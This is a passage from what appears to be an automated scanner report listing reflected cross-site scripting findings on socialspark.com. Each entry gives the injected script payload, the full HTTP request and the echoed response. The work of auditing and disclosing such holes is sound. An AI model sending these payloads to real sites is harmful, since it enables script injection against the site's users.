<meta property="og:url" content="http://socialspark.com/wp-content/themes/socialsparka66e1\"><script>alert(1)</script>e3336a71290/swf/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.181. http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa5b"><script>alert(1)</script>63da013567e was submitted in the REST URL parameter 4. This input was echoed as aaa5b\"><script>alert(1)</script>63da013567e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/socialspark/swfaaa5b"><script>alert(1)</script>63da013567e/uni_sans_semi_bold.swf HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.1.10.1300628473; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/socialspark/swfaaa5b\"><script>alert(1)</script>63da013567e/uni_sans_semi_bold.swf"/>
...[SNIP]...

1.182. http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d211c"><script>alert(1)</script>5f9d0bd0c34 was submitted in the REST URL parameter 5. This input was echoed as d211c\"><script>alert(1)</script>5f9d0bd0c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/socialspark/swf/uni_sans_semi_bold.swfd211c"><script>alert(1)</script>5f9d0bd0c34 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; __utmc=61366574; __utmb=61366574.1.10.1300628473; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; SnapABugHistory=1#; SnapABugVisit=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/themes/socialspark/swf/uni_sans_semi_bold.swfd211c\"><script>alert(1)</script>5f9d0bd0c34"/>
...[SNIP]...

1.183. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbeb5"><script>alert(1)</script>8b2b9b6f682 was submitted in the REST URL parameter 1. This input was echoed as cbeb5\"><script>alert(1)</script>8b2b9b6f682 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentcbeb5"><script>alert(1)</script>8b2b9b6f682/uploads/2010/04/phone_number.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-contentcbeb5\"><script>alert(1)</script>8b2b9b6f682/uploads/2010/04/phone_number.jpg"/>
...[SNIP]...

1.184. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0893"><script>alert(1)</script>4393fa348e0 was submitted in the REST URL parameter 2. This input was echoed as e0893\"><script>alert(1)</script>4393fa348e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploadse0893"><script>alert(1)</script>4393fa348e0/2010/04/phone_number.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploadse0893\"><script>alert(1)</script>4393fa348e0/2010/04/phone_number.jpg"/>
...[SNIP]...

1.185. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc0"><script>alert(1)</script>42977abd317 was submitted in the REST URL parameter 3. This input was echoed as c5cc0\"><script>alert(1)</script>42977abd317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010c5cc0"><script>alert(1)</script>42977abd317/04/phone_number.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010c5cc0\"><script>alert(1)</script>42977abd317/04/phone_number.jpg"/>
...[SNIP]...

1.186. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99bed"><script>alert(1)</script>881e53b5df2 was submitted in the REST URL parameter 4. This input was echoed as 99bed\"><script>alert(1)</script>881e53b5df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/0499bed"><script>alert(1)</script>881e53b5df2/phone_number.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:05 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/0499bed\"><script>alert(1)</script>881e53b5df2/phone_number.jpg"/>
...[SNIP]...

1.187. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7a1"><script>alert(1)</script>c5f166bd24f was submitted in the REST URL parameter 5. This input was echoed as 7e7a1\"><script>alert(1)</script>c5f166bd24f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/04/phone_number.jpg7e7a1"><script>alert(1)</script>c5f166bd24f HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg7e7a1\"><script>alert(1)</script>c5f166bd24f"/>
...[SNIP]...

1.188. http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/04/phone_number.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c78"><script>alert(1)</script>0fa4a9d3734 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1c78\"><script>alert(1)</script>0fa4a9d3734 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/04/phone_number.jpg?e1c78"><script>alert(1)</script>0fa4a9d3734=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/04/phone_number.jpg?e1c78\"><script>alert(1)</script>0fa4a9d3734=1"/>
...[SNIP]...

1.189. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12081"><script>alert(1)</script>da86297dcb5 was submitted in the REST URL parameter 1. This input was echoed as 12081\"><script>alert(1)</script>da86297dcb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content12081"><script>alert(1)</script>da86297dcb5/uploads/2010/05/izea_on_twitter.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content12081\"><script>alert(1)</script>da86297dcb5/uploads/2010/05/izea_on_twitter.jpg"/>
...[SNIP]...

1.190. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d80"><script>alert(1)</script>1874119d76 was submitted in the REST URL parameter 2. This input was echoed as 47d80\"><script>alert(1)</script>1874119d76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads47d80"><script>alert(1)</script>1874119d76/2010/05/izea_on_twitter.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads47d80\"><script>alert(1)</script>1874119d76/2010/05/izea_on_twitter.jpg"/>
...[SNIP]...

1.191. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce9b8"><script>alert(1)</script>bc720947da6 was submitted in the REST URL parameter 3. This input was echoed as ce9b8\"><script>alert(1)</script>bc720947da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010ce9b8"><script>alert(1)</script>bc720947da6/05/izea_on_twitter.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010ce9b8\"><script>alert(1)</script>bc720947da6/05/izea_on_twitter.jpg"/>
...[SNIP]...

1.192. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe35"><script>alert(1)</script>f8ab8b6b2dc was submitted in the REST URL parameter 4. This input was echoed as 2fe35\"><script>alert(1)</script>f8ab8b6b2dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/052fe35"><script>alert(1)</script>f8ab8b6b2dc/izea_on_twitter.jpg HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/052fe35\"><script>alert(1)</script>f8ab8b6b2dc/izea_on_twitter.jpg"/>
...[SNIP]...

1.193. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c4fe"><script>alert(1)</script>285b96f30a6 was submitted in the REST URL parameter 5. This input was echoed as 6c4fe\"><script>alert(1)</script>285b96f30a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/05/izea_on_twitter.jpg6c4fe"><script>alert(1)</script>285b96f30a6 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:50:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:50:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg6c4fe\"><script>alert(1)</script>285b96f30a6"/>
...[SNIP]...

1.194. http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-content/uploads/2010/05/izea_on_twitter.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f408"><script>alert(1)</script>ed317dd54f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f408\"><script>alert(1)</script>ed317dd54f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/uploads/2010/05/izea_on_twitter.jpg?8f408"><script>alert(1)</script>ed317dd54f4=1 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
